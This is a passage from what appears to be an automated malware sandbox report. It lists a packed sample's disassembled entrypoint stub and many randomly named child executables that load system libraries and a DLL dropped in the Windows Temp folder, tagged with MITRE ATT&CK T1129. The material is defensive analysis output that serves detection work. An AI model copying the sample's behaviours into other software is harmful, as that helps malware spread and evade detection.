4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"\n \"66846.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "module-10", "type": 10, "name": "Loads the RPC (Remote Procedure Call) module DLL", "description": "\"67d4588ff46156a2c2ce7c68405faa77c37384adb7fea589176985ca4b27e1ac.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 77BA0000\n \"vnxhhp.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 77BA0000\n \"hvnjft.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 77BA0000\n \"lxpbndn.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 77BA0000\n \"8284862.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 77BA0000\n \"2664824.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 77BA0000\n \"rbndhnn.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 77BA0000\n \"ltnxl.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 77BA0000\n \"rllbfv.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 77BA0000\n \"jvvbdv.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 77BA0000\n \"nnpjtv.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 77BA0000\n \"rbpjdh.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 77BA0000\n \"vnxlf.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 77BA0000\n \"68804.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 77BA0000\n \"264608.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 77BA0000\n \"hbxvf.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 77BA0000\n \"djhdv.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 77BA0000\n \"vvlhl.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 77BA0000\n \"ndnvnh.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 77BA0000\n \"nhxhrtb.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 77BA0000\n \"hhprhp.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 77BA0000\n \"fjprrfr.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 77BA0000\n \"nxxhj.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 77BA0000\n \"6644682.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 77BA0000\n \"4442828.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 77BA0000", "origin": "Loaded Module", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-7", "type": 6, "relevance": 1, "name": "Loads modules at runtime", "description": "\"vnxhhp.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 72e90000\n \"vnxhhp.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"vnxhhp.exe\" loaded module \"KERNEL32\" at base 76d00000\n \"vnxhhp.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"vnxhhp.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6caa0000\n \"hvnjft.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 72e90000\n \"hvnjft.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"hvnjft.exe\" loaded module \"KERNEL32\" at base 76d00000\n \"hvnjft.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"hvnjft.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6caa0000\n \"8284862.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 72e90000\n \"8284862.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"8284862.exe\" loaded module \"KERNEL32\" at base 76d00000\n \"8284862.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"8284862.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6caa0000\n \"2664824.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 72e90000\n \"2664824.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"2664824.exe\" loaded module \"KERNEL32\" at base 76d00000\n \"2664824.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"2664824.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6caa0000\n \"2664824.exe\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 75a00000\n \"rbndhnn.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 72e90000\n \"rbndhnn.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"rbndhnn.exe\" loaded module \"KERNEL32\" at base 76d00000\n \"rbndhnn.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"ltnxl.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 72e90000\n \"ltnxl.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"ltnxl.exe\" loaded module \"KERNEL32\" at base 76d00000\n \"ltnxl.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"ltnxl.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6caa0000\n \"ltnxl.exe\" loaded module \"MSVCRT.DLL\" at base 77a50000\n \"ltnxl.exe\" loaded module \"SHLWAPI.DLL\" at base 76570000\n \"ltnxl.exe\" loaded module \"USER32.DLL\" at base 76450000\n \"ltnxl.exe\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 75a00000\n \"rllbfv.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 72e90000\n \"rllbfv.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"rllbfv.exe\" loaded module \"KERNEL32\" at base 76d00000\n \"rllbfv.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"rllbfv.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6caa0000\n \"nnpjtv.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 72e90000\n \"nnpjtv.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"nnpjtv.exe\" loaded module \"KERNEL32\" at base 76d00000\n \"nnpjtv.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"rbpjdh.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 72e90000\n \"rbpjdh.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"rbpjdh.exe\" loaded module \"KERNEL32\" at base 76d00000\n \"rbpjdh.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"rbpjdh.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6caa0000\n \"68804.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 72e90000\n \"68804.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"68804.exe\" loaded module \"KERNEL32\" at base 76d00000\n \"68804.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"264608.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 72e90000\n \"264608.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"264608.exe\" loaded module \"KERNEL32\" at base 76d00000\n \"264608.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"264608.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6caa0000\n \"264608.exe\" loaded module \"MSVCRT.DLL\" at base 77a50000\n \"264608.exe\" loaded module \"SHLWAPI.DLL\" at base 76570000\n \"264608.exe\" loaded module \"USER32.DLL\" at base 76450000\n \"264608.exe\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 75a00000\n \"hbxvf.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 72e90000\n \"hbxvf.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"hbxvf.exe\" loaded module \"KERNEL32\" at base 76d00000\n \"hbxvf.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"hbxvf.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6caa0000\n \"djhdv.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 72e90000\n \"djhdv.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"djhdv.exe\" loaded module \"KERNEL32\" at base 76d00000\n \"djhdv.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"djhdv.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6caa0000\n \"ndnvnh.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 72e90000\n \"ndnvnh.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"ndnvnh.exe\" loaded module \"KERNEL32\" at base 76d00000\n \"ndnvnh.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"ndnvnh.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6caa0000\n \"nhxhrtb.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 72e90000\n \"nhxhrtb.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"nhxhrtb.exe\" loaded module \"KERNEL32\" at base 76d00000\n \"nhxhrtb.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"nhxhrtb.exe\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 75a00000\n \"fjprrfr.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 72e90000\n \"fjprrfr.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"fjprrfr.exe\" loaded module \"KERNEL32\" at base 76d00000\n \"fjprrfr.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"fjprrfr.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6caa0000\n \"nxxhj.exe\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 75a00000\n \"080068.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 72e90000\n \"080068.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"080068.exe\" loaded module \"KERNEL32\" at base 76d00000\n \"080068.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"04028.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 72e90000\n \"04028.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"04028.exe\" loaded module \"KERNEL32\" at base 76d00000\n \"04028.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"04028.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6caa0000\n \"04028.exe\" loaded module \"MSVCRT.DLL\" at base 77a50000\n \"04028.exe\" loaded module \"SHLWAPI.DLL\" at base 76570000\n \"04028.exe\" loaded module \"USER32.DLL\" at base 76450000\n \"04028.exe\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 75a00000\n \"jjtpnvv.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 72e90000\n \"jjtpnvv.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"jjtpnvv.exe\" loaded module \"KERNEL32\" at base 76d00000\n \"jjtpnvv.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"jjtpnvv.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6caa0000\n \"jjtpnvv.exe\" loaded module \"MSVCRT.DLL\" at base 77a50000\n \"jjtpnvv.exe\" loaded module \"SHLWAPI.DLL\" at base 76570000\n \"jjtpnvv.exe\" loaded module \"USER32.DLL\" at base 76450000\n \"jjtpnvv.exe\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 75a00000\n \"vtrrrtd.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 72e90000\n \"vtrrrtd.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"vtrrrtd.exe\" loaded module \"KERNEL32\" at base 76d00000\n \"vtrrrtd.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"vtrrrtd.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6caa0000\n \"llrlf.exe\" loaded module \"MSVCRT.DLL\" at base 77a50000\n \"llrlf.exe\" loaded module \"SHLWAPI.DLL\" at base 76570000\n \"llrlf.exe\" loaded module \"USER32.DLL\" at base 76450000\n \"llrlf.exe\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 75a00000\n \"djblbb.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 72e90000\n \"djblbb.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"djblbb.exe\" loaded module \"KERNEL32\" at base 76d00000\n \"djblbb.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"djblbb.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6caa0000\n \"bnjttb.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 72e90000\n \"bnjttb.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"bnjttb.exe\" loaded module \"KERNEL32\" at base 76d00000\n \"bnjttb.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"bnjttb.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6caa0000\n \"bnjttb.exe\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 75a00000\n \"jxtvd.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 72e90000\n \"jxtvd.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"jxtvd.exe\" loaded module \"KERNEL32\" at base 76d00000\n \"jxtvd.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"jxtvd.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6caa0000\n \"480606.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 72e90000\n \"480606.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"480606.exe\" loaded module \"KERNEL32\" at base 76d00000\n \"480606.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"480606.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6caa0000\n \"684202.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 72e90000\n \"684202.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"684202.exe\" loaded module \"KERNEL32\" at base 76d00000\n \"684202.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"244640.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 72e90000\n \"244640.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"244640.exe\" loaded module \"KERNEL32\" at base 76d00000\n \"244640.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"244640.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6caa0000\n \"6662204.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 72e90000\n \"6662204.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"6662204.exe\" loaded module \"KERNEL32\" at base 76d00000\n \"6662204.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"6662204.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6caa0000\n \"6602848.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 72e90000\n \"6602848.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"6602848.exe\" loaded module \"KERNEL32\" at base 76d00000\n \"6602848.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"6602848.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6caa0000\n \"jfpjt.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 72e90000\n \"jfpjt.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"jfpjt.exe\" loaded module \"KERNEL32\" at base 76d00000\n \"jfpjt.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"jfpjt.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6caa0000\n \"frftj.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 72e90000\n \"frftj.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"frftj.exe\" loaded module \"KERNEL32\" at base 76d00000\n \"frftj.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"frftj.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6caa0000\n \"22228.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 72e90000\n \"22228.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"22228.exe\" loaded module \"KERNEL32\" at base 76d00000\n \"22228.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"22228.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6caa0000\n \"66846.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 72e90000\n \"66846.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"66846.exe\" loaded module \"KERNEL32\" at base 76d00000\n \"66846.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"66846.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6caa0000\n \"66846.exe\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 75a00000\n \"242220.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 72e90000\n \"242220.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"242220.exe\" loaded module \"KERNEL32\" at base 76d00000\n \"242220.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"242220.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6caa0000\n \"nxdndh.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 72e90000\n \"nxdndh.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"nxdndh.exe\" loaded module \"KERNEL32\" at base 76d00000\n \"nxdndh.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"nxdndh.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6caa0000\n \"rndlb.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 72e90000\n \"rndlb.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"rndlb.exe\" loaded module \"KERNEL32\" at base 76d00000\n \"rndlb.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"rndlb.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6caa0000\n \"ldprbfj.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 72e90000\n \"ldprbfj.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"ldprbfj.exe\" loaded module \"KERNEL32\" at base 76d00000\n \"ldprbfj.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"ldprbfj.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6caa0000\n \"trrfx.exe\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 75a00000\n \"ddxvh.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 72e90000\n \"ddxvh.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"ddxvh.exe\" loaded module \"KERNEL32\" at base 76d00000\n \"ddxvh.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"ddxvh.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6caa0000\n \"0066646.exe\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 75a00000\n \"422022.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 72e90000\n \"422022.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"422022.exe\" loaded module \"KERNEL32\" at base 76d00000\n \"422022.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"422022.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6caa0000\n \"402060.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 72e90000\n \"402060.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"402060.exe\" loaded module \"KERNEL32\" at base 76d00000\n \"402060.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"402060.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6caa0000\n \"606282.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 72e90000\n \"606282.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"606282.exe\" loaded module \"KERNEL32\" at base 76d00000\n \"606282.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"606282.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6caa0000\n \"nxthl.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 72e90000\n \"nxthl.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"nxthl.exe\" loaded module \"KERNEL32\" at base 76d00000\n \"nxthl.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"nxthl.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6caa0000", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-175", "type": 6, "relevance": 1, "name": "Calls an API typically used to load libraries", "description": "\"vnxhhp.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00005936)\n \"vnxhhp.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00005936)\n \"vnxhhp.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00005936)\n \"vnxhhp.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00005936)\n \"hvnjft.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00005952)\n \"hvnjft.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00005952)\n \"hvnjft.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00005952)\n \"hvnjft.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00005952)\n \"8284862.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00006080)\n \"8284862.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00006080)\n \"8284862.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00006080)\n \"8284862.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00006080)\n \"2664824.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00004516)\n \"2664824.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00004516)\n \"2664824.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00004516)\n \"2664824.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00004516)\n \"rbndhnn.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00006132)\n \"rbndhnn.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00006132)\n \"rbndhnn.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00006132)\n \"rbndhnn.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00006132)\n \"ltnxl.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00006140)\n \"ltnxl.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00006140)\n \"ltnxl.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00006140)\n \"ltnxl.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00006140)\n \"ltnxl.exe\" called \"LoadLibrary\" with a parameter MSVCRT.dll (UID: 00000000-00006140)\n \"ltnxl.exe\" called \"LoadLibrary\" with a parameter SHLWAPI.dll (UID: 00000000-00006140)\n \"ltnxl.exe\" called \"LoadLibrary\" with a parameter USER32.dll (UID: 00000000-00006140)\n \"rllbfv.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00005416)\n \"rllbfv.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00005416)\n \"rllbfv.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00005416)\n \"rllbfv.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00005416)\n \"nnpjtv.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00003892)\n 